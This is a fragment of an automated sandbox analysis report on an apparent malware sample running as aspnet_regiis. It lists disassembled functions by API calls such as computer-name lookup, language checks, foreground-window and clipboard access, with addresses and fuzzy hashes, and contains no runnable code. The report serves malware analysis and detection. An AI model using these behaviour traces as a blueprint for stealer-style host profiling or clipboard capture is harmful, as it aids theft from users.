                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID:
                                                                                              • API String ID: 237503144-0
                                                                                              • Opcode ID: 479bbed547b62efafeed414bb21cee3401d8f09f480f4145d907a146132bc28a
                                                                                              • Instruction ID: 2c0adb75c84fb586b07ebcf23682b2aa62dbb2fb4b6723a9d322f8e641b826da
                                                                                              • Opcode Fuzzy Hash: 479bbed547b62efafeed414bb21cee3401d8f09f480f4145d907a146132bc28a
                                                                                              • Instruction Fuzzy Hash: 0191B6B09083809FD711CF25D8916ABBBF4FF86714F40896CF4C69B241E3798946CB92
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(027D095A,00000002,00000018,?,?,00000018,?,?,?), ref: 027CD78E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1060 27c7b21-27c7b54 GetUserDefaultUILanguage 1061 27c7b56-27c7b59 1060->1061 1062 27c7b5b-27c7bb1 1061->1062 1063 27c7bb3-27c7be1 1061->1063 1062->1061
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 027C7B27
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguageUser
                                                                                              • String ID: afg
                                                                                              • API String ID: 95929093-2051710476
                                                                                              • Opcode ID: a9140bc178d8e696a724dcda909e0ae9b57f0b2a656614dad9c394ec76f6abcc
                                                                                              • Instruction ID: 53f075ee487afe618cfa0aa6be89bb8893c892611494c534aab8d7354069ee9d
                                                                                              • Opcode Fuzzy Hash: a9140bc178d8e696a724dcda909e0ae9b57f0b2a656614dad9c394ec76f6abcc
                                                                                              • Instruction Fuzzy Hash: D6112731F452988FDB2CCA38CC863D9BAA35F8A300F18C1EDC95997380C97A0E018F91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1116 27bcc80-27bcc8a 1117 27bccda 1116->1117 1118 27bcc8c-27bcc97 1116->1118 1120 27bccde-27bcd2f FreeLibrary call 27cf3e0 1117->1120 1119 27bcca0-27bcca9 1118->1119 1119->1119 1121 27bccab 1119->1121 1126 27bcd30-27bcd94 1120->1126 1121->1120 1126->1126 1127 27bcd96-27bcda0 1126->1127 1128 27bcdcd-27bcdd1 1127->1128 1129 27bcda2-27bcdb1 1127->1129 1130 27bcdd5-27bce19 GetComputerNameExA 1128->1130 1131 27bcdc0-27bcdc9 1129->1131 1133 27bce1e 1130->1133 1131->1131 1132 27bcdcb 1131->1132 1132->1130 1133->1133
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?), ref: 027BCCEC
                                                                                              • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerFreeLibraryName
                                                                                              • String ID:
                                                                                              • API String ID: 2904949787-0
                                                                                              • Opcode ID: c100bf256683b56d14d9e23ca46841779661dd004d419141baa856c4dc2089a8
                                                                                              • Instruction ID: 8e48e095e208c803f47dbc06a82f63a037a5a0f99e50f34098fa617a4c912b77
                                                                                              • Opcode Fuzzy Hash: c100bf256683b56d14d9e23ca46841779661dd004d419141baa856c4dc2089a8
                                                                                              • Instruction Fuzzy Hash: 113139369492808FD72A8F25C8507EBBBE2AFD6314F08C96ED4C9D7344DB385805CB51
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?), ref: 027BCCEC
                                                                                              • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerFreeLibraryName
                                                                                              • String ID:
                                                                                              • API String ID: 2904949787-0
                                                                                              • Opcode ID: 998caf312d6baf90129182b1beef5521841592e962de59e85014e0debf61c9fc
                                                                                              • Instruction ID: fdf3deb02a137374645a9f42d0bcf37a992a34220b967e71cf6c5840aa1a7af6
                                                                                              • Opcode Fuzzy Hash: 998caf312d6baf90129182b1beef5521841592e962de59e85014e0debf61c9fc
                                                                                              • Instruction Fuzzy Hash: DB317676A492408BD72A8F25CC417EBBBA3AFD6314F09C96ED4C9D3384DE785801CB91
                                                                                              APIs
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0279EA9A
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0279EAB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 640775948-0
                                                                                              • Opcode ID: 0b6ec69123b97f410b0c5fe309cc94be004ce96ab3a77dd7d1b8b422c59c4ecc
                                                                                              • Instruction ID: adb615922daeaf4e49ab6fc5c13b48f10be66bec08f0a694f634d4eaedec3c0b
                                                                                              • Opcode Fuzzy Hash: 0b6ec69123b97f410b0c5fe309cc94be004ce96ab3a77dd7d1b8b422c59c4ecc
                                                                                              • Instruction Fuzzy Hash: 69F0463ABC8320B7F2B84610EE67F0426205B50F20F3A8712BB797E3C186F83811418C
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 027CE5F1
                                                                                              • GetForegroundWindow.USER32 ref: 027CE602
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ForegroundWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2020703349-0
                                                                                              • Opcode ID: 2ae8fca5a80073e53ff7dea0653fcd4c28276048efc5e18bb57586f996690208
                                                                                              • Instruction ID: 61cb8645ef957e12b4712157d81c799251f595c7520c582299d31d5a46d972a5
                                                                                              • Opcode Fuzzy Hash: 2ae8fca5a80073e53ff7dea0653fcd4c28276048efc5e18bb57586f996690208
                                                                                              • Instruction Fuzzy Hash: 56D09EE8E835016BDA0896B6FD094163727A79A3463158819E802C2B17D93595278A57
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 027BCDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID:
                                                                                              • API String ID: 3545744682-0
                                                                                              • Opcode ID: 48d07c753870f480aa571151a119a49d0fdc28d5c98b2dfc59483824ee31d35b
                                                                                              • Instruction ID: 8ed8c8b5854d3f1eee9d551cb2c34be07d6c3c5c1e143895a3834d92c2af6bc9
                                                                                              • Opcode Fuzzy Hash: 48d07c753870f480aa571151a119a49d0fdc28d5c98b2dfc59483824ee31d35b
                                                                                              • Instruction Fuzzy Hash: 95315676A492508BD7298F25C8517EBBBA3AFD6314F09C96EC4C4D3384DE7898018B91
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 027BCEDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID:
                                                                                              • API String ID: 3545744682-0
                                                                                              • Opcode ID: ac676719ee80dd655929aa25eb8385e3e4004a4fe6809c616a0793b9b0856840
                                                                                              • Instruction ID: d6ff9e3a4ed2a172bd2d8ea35b5e1a44a9d20ac5a33e864b3656fb12e8eafa3d
                                                                                              • Opcode Fuzzy Hash: ac676719ee80dd655929aa25eb8385e3e4004a4fe6809c616a0793b9b0856840
                                                                                              • Instruction Fuzzy Hash: 8711906450C3C18EDB368B3884687FBBBD5AF97324F188A6EC4D8C7282DB344045CB12
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 027BCEDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID:
                                                                                              • API String ID: 3545744682-0
                                                                                              • Opcode ID: 2db2b797e33e38ff2a9c34b9e5b43f1a1a3ff47baee5f26fe2e65baf0ce803f7
                                                                                              • Instruction ID: 5eb1fb06510fd65c37735c270dd77c164fa865936df17b47623c8bad4d417382
                                                                                              • Opcode Fuzzy Hash: 2db2b797e33e38ff2a9c34b9e5b43f1a1a3ff47baee5f26fe2e65baf0ce803f7
                                                                                              • Instruction Fuzzy Hash: 5611C07454D3C18FDB368B3889987EBBBD5AF96324F188A6EC5D8C7281DB344045CB12
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0279B3D6,00000000,0279B4C3,?,00000000,?,00000000), ref: 027CD732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 1d715f95ff5664d0829f90f8dafe030c676a6351087bd0330ba2da9c54c68939
                                                                                              • Instruction ID: d433879ba2e8730e33342b559f6d98576f5728717f33c5040c84f6e51ad3d552
                                                                                              • Opcode Fuzzy Hash: 1d715f95ff5664d0829f90f8dafe030c676a6351087bd0330ba2da9c54c68939
                                                                                              • Instruction Fuzzy Hash: CCE02B32915612EBC2512E347C0AB173779DFC6720F164C3CF401E7104EA31E811CAA3
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: ec0c63a0c188dd434f4c77eea73e68b7cadcaeec27b9eab93db4ed51db1c9124
                                                                                              • Instruction ID: 8b4182d5f0c5ae42fc9ae5fbcd92df0f1156baf177b8abd58aa6b0fa7fb53c97
                                                                                              • Opcode Fuzzy Hash: ec0c63a0c188dd434f4c77eea73e68b7cadcaeec27b9eab93db4ed51db1c9124
                                                                                              • Instruction Fuzzy Hash: 4AF0E7B46497018FE314DF28D5A571ABBF1FB88704F10980CE4998B394CB799A49CF82
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 2e4bda15b3889ea896ccbbb72088f046a58423d4b4a021b9745b202f94fcac5b
                                                                                              • Instruction ID: d8208cef2369db336c629b7290e08fa14cd900bdcf780da4d2271e47e025a5de
                                                                                              • Opcode Fuzzy Hash: 2e4bda15b3889ea896ccbbb72088f046a58423d4b4a021b9745b202f94fcac5b
                                                                                              • Instruction Fuzzy Hash: 04F0D4B05097418FD314DF28D4A871BBBF1FB84308F10880CE4A98B380D7B6AA488F82
                                                                                              APIs
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0279CAE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 0d16af20c42407eb29a8321a7f2d80d1d5fc343a2947bdee367cbc6ae7bbefd4
                                                                                              • Instruction ID: 21b227fd4c3b20b2d977c4dac89b188469a55e0b93c4861413640d3d56674213
                                                                                              • Opcode Fuzzy Hash: 0d16af20c42407eb29a8321a7f2d80d1d5fc343a2947bdee367cbc6ae7bbefd4
                                                                                              • Instruction Fuzzy Hash: 4BD0A7319E15046BD350A57DEC97F263A3CD342715F404B1AF6A2D62C2DD306820D6A5
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,027CD74B,?,0279B3D6,00000000,0279B4C3,?,00000000,?,00000000), ref: 027CBB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 10596af35643157b21a0646ccf69674dc0dedd3e212debd1909215d18c38f846
                                                                                              • Instruction ID: 88679260165f007f74902f1977714dd7f9450bb54d73139f04e334388ed0c7ea
                                                                                              • Opcode Fuzzy Hash: 10596af35643157b21a0646ccf69674dc0dedd3e212debd1909215d18c38f846
                                                                                              • Instruction Fuzzy Hash: 10D0C971849132EBCA512B28BC05BC77AA59F49320F4B8D95A844AE0A4D634ACA1CAD4
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,027988C0,DED9EF53), ref: 027CBB20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 341118bb1871ca0a6d337b9bedbd1088b641adcf925388c3b23efdedcc765217
                                                                                              • Instruction ID: 813347a48541c668d5223356325e68f8cd81582edeef8298bcdbb2903f065e71
                                                                                              • Opcode Fuzzy Hash: 341118bb1871ca0a6d337b9bedbd1088b641adcf925388c3b23efdedcc765217
                                                                                              • Instruction Fuzzy Hash: C2C09B31445120EBC9516B14FC09FC67F55DF55351F154495B444670F4C7706C51CAD4
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1494355150-0
                                                                                              • Opcode ID: 5b4a193cf51d0dda28bd69d3433a4001e8ff56abae5250852bc9f2777c1f7130
                                                                                              • Instruction ID: d5bfa9d0f5b6b60b04fde09be38318792b2378704dfcb46c805eac451847999a
                                                                                              • Opcode Fuzzy Hash: 5b4a193cf51d0dda28bd69d3433a4001e8ff56abae5250852bc9f2777c1f7130
                                                                                              • Instruction Fuzzy Hash: E041AB7150C7928FC311AF7C945836FBEE1AB86320F184A6DE8E5962D2D634854AC7A3
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 027B81DE
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 027B823F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: 67
                                                                                              • API String ID: 237503144-1886922373
                                                                                              • Opcode ID: a7176d0c0a9cb3c5111583f076da233104bf071a217a5fccf090a09703d863e5
                                                                                              • Instruction ID: a1a6bd0a9484b35f1268412a99a66c4673a5a9ea08cf986f9bed1e9a8657924a
                                                                                              • Opcode Fuzzy Hash: a7176d0c0a9cb3c5111583f076da233104bf071a217a5fccf090a09703d863e5
                                                                                              • Instruction Fuzzy Hash: 1FD1EA71A083158FD725DF28D890BABF7F6EFC5314F05892CE9999B281E7B09505CB82
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,D797D5F1), ref: 027B3B72
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,D797D5F1,D797D5F1), ref: 027B3BE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: qx
                                                                                              • API String ID: 237503144-692295476
                                                                                              • Opcode ID: f1a09d7fb0bd809742253951a2c930d29f9dc33d60e1b7b1ef0ec276f03ac050
                                                                                              • Instruction ID: f986a4827137238041d2440b1ed0d8bee27c56ae7a87c67d235b7dccf75c1684
                                                                                              • Opcode Fuzzy Hash: f1a09d7fb0bd809742253951a2c930d29f9dc33d60e1b7b1ef0ec276f03ac050
                                                                                              • Instruction Fuzzy Hash: D98124B5E403199FEB10CFA8EC807DEBBB1FB44310F158169E949AB281D37198068BD0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
